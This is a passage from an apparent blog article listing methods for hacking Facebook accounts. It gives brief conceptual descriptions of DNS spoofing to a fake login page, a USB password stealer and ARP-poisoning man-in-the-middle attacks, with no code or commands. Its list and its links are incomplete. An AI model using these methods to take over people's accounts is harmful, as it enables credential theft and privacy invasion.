1. Mobile Spy 

6. DNS Spoofing 

If both the victim and attacker are on the same network, an attacker can use a DNS spoofing attack and change the original facebook.com page to his own fake page and hence can get access to victims facebook account.

7. USB Hacking 

Usb password stealer
If an attacker has physical access to your computer, he could just insert a USB programmed with a function to automatically extract saved passwords in the browser, I have also posted related to this attack which you can read by accessing the link below:

8. Man In the Middle Attacks

If the victim and attacker are on the same lan and on a switch based network, A hacker can place himself b/w the client and the server or he could also act as a default gateway and hence capturing all the traffic in between, ARP Poisoning which is the other name for man in the middle attacks is a very broad topic and is beyond the scope of this article, We have written a couple of articles on man in the middle attacks which canb be accessed from the links mentioned below:
If you are really interested in learning how man in the middle attacks, you can view the presentation 

1 comment